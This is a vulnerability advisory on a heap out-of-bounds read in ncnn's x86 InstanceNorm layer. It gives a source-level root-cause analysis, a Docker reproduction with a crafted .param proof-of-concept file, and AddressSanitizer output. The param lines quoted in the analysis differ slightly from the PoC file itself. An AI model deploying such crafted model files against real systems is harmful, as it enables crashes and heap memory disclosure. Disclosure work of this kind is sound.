InstanceNorm Heap Out-Of-Bounds Read
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/instancenorm_x86.cpp:144 in InstanceNorm_x86::forward_inplace
Sanitizer verdict: heap-buffer-overflow
Summary
InstanceNorm sizes its affine parameter arrays from the channels value in the .param file but normalises whatever number of channels the runtime tensor actually has. A model that declares 0=1 while feeding a 100-channel tensor makes the x86 implementation index gamma_data/beta_data far past their one-element allocations, leaking adjacent heap floats into the normalisation result and aborting the process under ASan. The PoC runs ncnnoptimize with a null bin file, so the crash is reachable from the .param file alone.
Detail
InstanceNorm::load_param() reads channels from param id 0 and affine from param id 2, and load_model() uses channels — and only channels — to size the two affine arrays:
// src/layer/instancenorm.cpp:23
int InstanceNorm::load_model(const ModelBin& mb)
{
if (affine == 0)
return 0;
gamma_data = mb.load(channels, 1);
if (gamma_data.empty())
return -100;
beta_data = mb.load(channels, 1);
if (beta_data.empty())
return -100;
Nothing ever compares channels against the channel count of the tensor that arrives at inference time. InstanceNorm_x86::forward_inplace() derives its loop bound from the blob instead, and then uses the same loop variable to subscript the parameter arrays:
// src/layer/x86/instancenorm_x86.cpp:40
int c = bottom_top_blob.c;
int size = w * h * d;
#pragma omp parallel for num_threads(opt.num_threads)
for (int q = 0; q < c; q++)
// src/layer/x86/instancenorm_x86.cpp:142
if (affine)
{
float gamma = gamma_data[q];
float beta = beta_data[q];
The PoC's Input input 0 1 input 0=2 1=2 2=100 makes ModelWriter::shape_inference() create a 2x2x100 float blob, so c = 100, while InstanceNorm norm 1 1 input norm 0=1 1=0.001 2=1 declares channels = 1. mb.load(1, 1) calls Mat::create(1), whose allocation is 16 bytes of payload plus a 4-byte refcount plus the 64-byte NCNN_MALLOC_OVERREAD tail — the 84-byte region in the report. gamma_data[q] is a raw float* subscript with no bound of its own, so the loop reads float indices 0 through 99; index 21 is at byte offset 84 and is the first address past the allocation, which is where AddressSanitizer stops the run. Every q >= 1 mixes uninitialised or foreign heap contents into the layer's scale and bias.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-instancenorm-heap-out-of-bounds-read && cd ncnn-poc-instancenorm-heap-out-of-bounds-read
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'POC_EOF'
7767517
2 2
Input input 0 1 in 0=1 1=1 2=100
InstanceNorm norm 1 1 in out 0=1 2=1
POC_EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000094 at pc 0x5fd28ed64bdd bp 0x7ffdd4057af0 sp 0x7ffdd4057ae0
READ of size 4 at 0x50e000000094 thread T0
#0 0x5fd28ed64bdc in ncnn::InstanceNorm_x86_avx512::forward_inplace(ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/instancenorm_x86_avx512.cpp:144
#1 0x5fd289522fd8 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:711
#2 0x5fd289515b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x5fd2895759e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x5fd2894073c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x5fd289484eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x7b8cd8d801c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x7b8cd8d8028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x5fd289404624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000094 is located 0 bytes after 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
#0 0x7b8cd93f9f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x5fd2894d3bc5 in fastMalloc /ncnn/src/allocator.h:62
#2 0x5fd2894d3bc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
#3 0x5fd289508c1a in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:309
#4 0x5fd28ed52ec9 in ncnn::InstanceNorm::load_model(ncnn::ModelBin const&) /ncnn/src/layer/instancenorm.cpp:28
#5 0x5fd289570a84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
#6 0x5fd289484c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#7 0x7b8cd8d801c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x7b8cd8d8028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x5fd289404624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/instancenorm_x86_avx512.cpp:144 in ncnn::InstanceNorm_x86_avx512::forward_inplace(ncnn::Mat&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst